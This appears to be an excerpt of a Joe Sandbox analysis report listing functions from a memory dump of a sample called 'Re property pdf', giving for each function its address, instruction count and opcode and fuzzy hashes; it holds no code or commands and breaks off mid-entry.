                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 54eb4ef50b9f55e03d87cc84d5814747d8509af1cbc1b71f3120204aad3b5491
                                                                                                                              • Instruction ID: 111638c7b8ae7d5d2eaa3808c139af47cfa6957c8d9b7a7e3b7962c42c2e8a4e
                                                                                                                              • Opcode Fuzzy Hash: 54eb4ef50b9f55e03d87cc84d5814747d8509af1cbc1b71f3120204aad3b5491
                                                                                                                              • Instruction Fuzzy Hash: DF81C172A04716CFEB25CF98C584BAEB7F5BF88310F15816ED984AB681C7799D40CB90
                                                                                                                              Function 010D8324 Relevance: .2, Instructions: 192COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 703f072b2caf1a33c8cfca458cfdf7448048b509d2e414e36c0915342a0f590f
                                                                                                                              • Instruction ID: c2ec2925a7252e97b9deeab70a6954700aa3c0d4639856eea6aa0aa307495e31
                                                                                                                              • Opcode Fuzzy Hash: 703f072b2caf1a33c8cfca458cfdf7448048b509d2e414e36c0915342a0f590f
                                                                                                                              • Instruction Fuzzy Hash: 01711BB1E00209AFDB15DF94C881FEEBBB8FF04750F10816AF654A7290D774AA05CB90
                                                                                                                              Function 010BA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 24c55ff218835eb44b594f249a4c570072a4fcf8de7d095273b52055fe6c7af2
                                                                                                                              • Instruction ID: 8ee9c4e6a4aa9b37704335a318d089d7b24526d61b7d8d0914ecf6e24df71db3
                                                                                                                              • Opcode Fuzzy Hash: 24c55ff218835eb44b594f249a4c570072a4fcf8de7d095273b52055fe6c7af2
                                                                                                                              • Instruction Fuzzy Hash: 6451AE72604712EFD711DA68C884B9BBBE8EBC9750F004929BA80DB250DB75ED05C7A2
                                                                                                                              Function 010A8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 20c1325d53220bdc32ae7fc90be206f949db78e43d908aaa7c6ecf0fba1833ed
                                                                                                                              • Instruction ID: 8f4ca9e48a6358a125e093d3fe9528d8189e29a3dfd6a628c3b1d2f9b92820bf
                                                                                                                              • Opcode Fuzzy Hash: 20c1325d53220bdc32ae7fc90be206f949db78e43d908aaa7c6ecf0fba1833ed
                                                                                                                              • Instruction Fuzzy Hash: 8051B2B0900705DFD721DFAAC880AABFBF8BF94711F50861EE2D6576A0DBB0A545CB50
                                                                                                                              Function 0103E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 86c7e1d681abef4613544105024a5623f69a887832da1990502ea17564be99ab
                                                                                                                              • Instruction ID: dd58b146df7a69f56746217cb6769fdfc79ed7b4fef2d70bd53ae33fac4e760f
                                                                                                                              • Opcode Fuzzy Hash: 86c7e1d681abef4613544105024a5623f69a887832da1990502ea17564be99ab
                                                                                                                              • Instruction Fuzzy Hash: F7518D71600A09DFCB22EF69C980EAAB3FDFF58794F400569E58197660EB34ED51CB50
                                                                                                                              Function 010A4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9dc8e724f24943d6112508e1474d0d833c85623086b8c659acd34263a5517995
                                                                                                                              • Instruction ID: 8b2d6b6b2bd5400b77720cc01ac82081963406eb6e65ceab90cd8f7b4c5ea3a1
                                                                                                                              • Opcode Fuzzy Hash: 9dc8e724f24943d6112508e1474d0d833c85623086b8c659acd34263a5517995
                                                                                                                              • Instruction Fuzzy Hash: 79517A766083029FD754DF69C880AABBBE5BFC8204F88892DF5C5C7250EB70D905CB52
                                                                                                                              Function 010245B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                              • Instruction ID: 7a28ebc0634abc1211812331b2a3c3666ac7d865c90dba1e03187c98d153e630
                                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                              • Instruction Fuzzy Hash: A5519E71E0022AABDF15DF98C840BEEBBB9BF49354F044069EA95EB240D774DD44CBA4
                                                                                                                              Function 0108E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                              • Instruction ID: adf747680463f1a23def0dbf968b6e31735c77d579acd35d41eaca6a19d86ea1
                                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                              • Instruction Fuzzy Hash: 1351B771D0421AEFEF21FA94C890BEFBBB5AB00724F154665DAD267291D7309E40C7A0
                                                                                                                              Function 010C8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 71131de2b26c939134a86fcbd8c2014ff9980c39118f97a3e680dc4bedeee4bc
                                                                                                                              • Instruction ID: ab60f5ce9e6c12f92904d23a8db0a7c34bc3b9a50d56cdcb76d4f576aa7ca669
                                                                                                                              • Opcode Fuzzy Hash: 71131de2b26c939134a86fcbd8c2014ff9980c39118f97a3e680dc4bedeee4bc
                                                                                                                              • Instruction Fuzzy Hash: 3041E5707016159BD769DB2DC895BBFBBDAEF80A20F04C15EE9D5872C0DB34D801CA98
                                                                                                                              Function 0108CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b33c07b9fdf03c24ed90e3d1349ba8a8be69fa2f9a1f12e558d10d1f9ae068d7
                                                                                                                              • Instruction ID: b7614984a66b14fa35bfb36959cf545ff6a6ba2d2b0477961ee74d7920c28c69
                                                                                                                              • Opcode Fuzzy Hash: b33c07b9fdf03c24ed90e3d1349ba8a8be69fa2f9a1f12e558d10d1f9ae068d7
                                                                                                                              • Instruction Fuzzy Hash: C3517B7190021ADFEB20FFA9CA809DEBBF9FB48214F15855AD5C5A7704DB35A901CBA0
                                                                                                                              Function 010CA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction ID: 1a87e52f123ba38939fab6278c0dbc9ea234513e43e4764e4ee9a2df70f6c6c1
                                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction Fuzzy Hash: F741C47170171ADFDB25CF68C980AAEB7E9FF84614B05466EE99287244FB30ED14CB90
                                                                                                                              Function 010301F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ce2c2f4913f48b7f97d5720151a9f6d87f96dd8c53dd4678684389864e8283eb
                                                                                                                              • Instruction ID: 423e0f25c0eb6a3e950bdc949575bb9349df946193e69435a792e031db7092c1
                                                                                                                              • Opcode Fuzzy Hash: ce2c2f4913f48b7f97d5720151a9f6d87f96dd8c53dd4678684389864e8283eb
                                                                                                                              • Instruction Fuzzy Hash: 2D41DE35E02219DBDB14DF98C440AEEB7B8BF89710F1481AAF895F7244D7359D01CBA4
                                                                                                                              Function 0102EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 09e268b5c1b1c6df5f81d53809859a5c76df698fbc7ec930b030155d9225ebb5
                                                                                                                              • Instruction ID: 0e065d71106524dc0689f68c95f73f09fd5b3f2cfc31c6832c4b1b3ce20417fd
                                                                                                                              • Opcode Fuzzy Hash: 09e268b5c1b1c6df5f81d53809859a5c76df698fbc7ec930b030155d9225ebb5
                                                                                                                              • Instruction Fuzzy Hash: F941B0712043069FD724EF68C880AABB7EAFF98224F10487EE9D7C7615DB35E8458B51
                                                                                                                              Function 01042750 Relevance: .1, Instructions: 137COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction ID: af9bde7cf4886380f13cee6828d503f2215d460f0f54086d17d1ea84b293dfe5
                                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction Fuzzy Hash: D9514775E00219DFCB55CF98C480AAEF7F2FF84710F2881A9D995AB351D730AA42CB90
                                                                                                                              Function 01006154 Relevance: .1, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d56d7027be03bae1c045b0c7bee58ceaf1b30c81fff5b748ac9ba79e0e362e29
                                                                                                                              • Instruction ID: 6cc6516274b5d8a135758c8ecfe2ac3c74f7ed2c0c09731a235c1a522a9ddca3
                                                                                                                              • Opcode Fuzzy Hash: d56d7027be03bae1c045b0c7bee58ceaf1b30c81fff5b748ac9ba79e0e362e29
                                                                                                                              • Instruction Fuzzy Hash: 18512770940606DBEB26CB68CC00BE8BBF6EF01314F1442E9E599976C5DB3A5991CF40
                                                                                                                              Function 01000BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 74f013810813017c997f88d4b8cf22ddf79798bc7c2a5865a39c16039847c779
                                                                                                                              • Instruction ID: bd3194ab9da060b46104d9ff900231d01b1d8ff6f94dbbd7438cb6d1f75bc57e
                                                                                                                              • Opcode Fuzzy Hash: 74f013810813017c997f88d4b8cf22ddf79798bc7c2a5865a39c16039847c779
                                                                                                                              • Instruction Fuzzy Hash: 43417375A0022D9FDB62EF68C940FEEB7B4EF45750F0100A5E988AB285D7749E84CF91
                                                                                                                              Function 010C866E Relevance: .1, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction ID: 7912f60c03801e17340b79a368ab7184144bfe9b80f18aa030385099c7ddc9c8
                                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction Fuzzy Hash: E7419575B00105ABDB15DB99CC84AEFBBBABF88A10F14806EE584A7341D770DD008B64
                                                                                                                              Function 01000887 Relevance: .1, Instructions: 128COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a137e3fed5f8bc00f2fc815da397803e10cad20cd1d50e5e34fbae79e796c71c
                                                                                                                              • Instruction ID: 9a38efc781c7b37ea7297abc2f8a405d1c4546203102d65203bb759bc8325fd8
                                                                                                                              • Opcode Fuzzy Hash: a137e3fed5f8bc00f2fc815da397803e10cad20cd1d50e5e34fbae79e796c71c
                                                                                                                              • Instruction Fuzzy Hash: 5A41B2706007029FE326CF28C480A66B7F5FF49354F104A6EE5C786A94EB35E945CB90
                                                                                                                              Function 0102A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cd54507efded961e176ed21e8c83abe470f77a898cb2fe9fea56746d9e728db2
                                                                                                                              • Instruction ID: 9cb1eff06a49cc47b585586be8ff8bd46451f07fa5f465c4e0db39e852bea18a
                                                                                                                              • Opcode Fuzzy Hash: cd54507efded961e176ed21e8c83abe470f77a898cb2fe9fea56746d9e728db2
                                                                                                                              • Instruction Fuzzy Hash: 2541D331A41224CFDB21DF68C8857EF7BB4FB54320F1401A9D891ABA95DF39D944CBA0
                                                                                                                              Function 01008BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 77fb771037b5ba0194bd0df5f9030f1ee6af4f3adf41e8c555493a4987a42475
                                                                                                                              • Instruction ID: a28ec64f67acc46f2a1af2b2b89617a1ec216264581168cdc4297885f96487b8
                                                                                                                              • Opcode Fuzzy Hash: 77fb771037b5ba0194bd0df5f9030f1ee6af4f3adf41e8c555493a4987a42475
                                                                                                                              • Instruction Fuzzy Hash: 2641F231E00216CBE7269F48C881AAFBBB5FB94704F14C12FD9859B695C77A9842CB90
                                                                                                                              Function 00FF8918 Relevance: .1, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 397832cc177c41a999de58d4bfd685add1c2573499f6684f187c54009a1d3dda
                                                                                                                              • Instruction ID: 67a38517448af761192371b2e1f9a4fd673b1e3991189b2ff1c5cde20625bebd
                                                                                                                              • Opcode Fuzzy Hash: 397832cc177c41a999de58d4bfd685add1c2573499f6684f187c54009a1d3dda
                                                                                                                              • Instruction Fuzzy Hash: 8141603250831A9ED321DF55C840A7BB7E9FF84B94F40092AFA80D7160E771DE059B93
                                                                                                                              Function 00FFA020 Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction ID: 000dafed21d6a29d9d4b31361726a585c19c185c70570d0dfe75945a065a29a7
                                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction Fuzzy Hash: 1E416072A00219EFDB51DF18D4407BFB7B2EF50714F1580AAEE898B250DA37AD40EB91
                                                                                                                              Function 010009AD Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bcf6e582deee04f84c893cf5965f5a40b0c0e1a9bda71947024ab0663169b570
                                                                                                                              • Instruction ID: 052228f0975c9c9ff6d28d9bba5a40ffbc16260f14d2246691ec51a657895e23
                                                                                                                              • Opcode Fuzzy Hash: bcf6e582deee04f84c893cf5965f5a40b0c0e1a9bda71947024ab0663169b570
                                                                                                                              • Instruction Fuzzy Hash: 55419F71640701EFE322CF18C840B6ABBF4FF59354F24866AE489CB295E771E942CB91
                                                                                                                              Function 01030710 Relevance: .1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction ID: b8123cbc3f8c7fe9a2cda0807914522425620d777afa6e3b68509003ea033124
                                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction Fuzzy Hash: D5415C75A01705EFDB25CF99C980AAABBF8FF58700B10496DE596D7254D330EA44CF90
                                                                                                                              Function 0100262C Relevance: .1, Instructions: 119COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c98752be382780e5081bfe0a9d834a5a8e1e74b44fc92fdf263eecd0fe6c6318
                                                                                                                              • Instruction ID: 1b665fc1cfd5345b421f947fc4d2077e15d9a489ca5f4c7f1dca02785c1ed8d9
                                                                                                                              • Opcode Fuzzy Hash: c98752be382780e5081bfe0a9d834a5a8e1e74b44fc92fdf263eecd0fe6c6318
                                                                                                                              • Instruction Fuzzy Hash: 6441D170501705CFEB62EF28C9046A9B7F2FF48310F1082AEC5CA9B6E1DB34A941CB41
                                                                                                                              Function 0103C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ca9606de0280e03ec97e25df8db5825452cfd3fd309be9f6bf52de310812440
                                                                                                                              • Instruction ID: f7209f48e25133fc1eefe765d673ea01ea219310088edee91f09a9273f2ce4b7
                                                                                                                              • Opcode Fuzzy Hash: 6ca9606de0280e03ec97e25df8db5825452cfd3fd309be9f6bf52de310812440
                                                                                                                              • Instruction Fuzzy Hash: 083197B2A00345DFEB52CFA8C540799BBF4EB49728F2181AED149EB251D7369902CB90
                                                                                                                              Function 010807C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e6430a7f64f8c8df829a0a3ffc5b7471626116039e8b8c1e98996742edea4029
                                                                                                                              • Instruction ID: edc86809b5137d764d24f86d342287216fe3c88c8977181977bd42def600c665
                                                                                                                              • Opcode Fuzzy Hash: e6430a7f64f8c8df829a0a3ffc5b7471626116039e8b8c1e98996742edea4029
                                                                                                                              • Instruction Fuzzy Hash: 80418BB15083019BD360EF29C845B9BBBE8FF88614F008A2EF9D8D7290D7749844CB92
                                                                                                                              Function 00FF80A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4e26face25fc46c5ae6362cf0df2d511bce0d82247a5b4b6661889cd7359bd61
                                                                                                                              • Instruction ID: 9089b05b80030335c0be7f44dd50d51ed6515676b55b80df7fc1b1f560a3b2fd
                                                                                                                              • Opcode Fuzzy Hash: 4e26face25fc46c5ae6362cf0df2d511bce0d82247a5b4b6661889cd7359bd61
                                                                                                                              • Instruction Fuzzy Hash: 4A41E372E056199FDB11DF58CC806B9B7B1BF047A0F208329E955A72A0DF34ED43AB90
                                                                                                                              Function 010805A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 628a6dd5d5be00b7d38bdc1192144556ac767dedbf73d5d53f7d3eee47d3f304
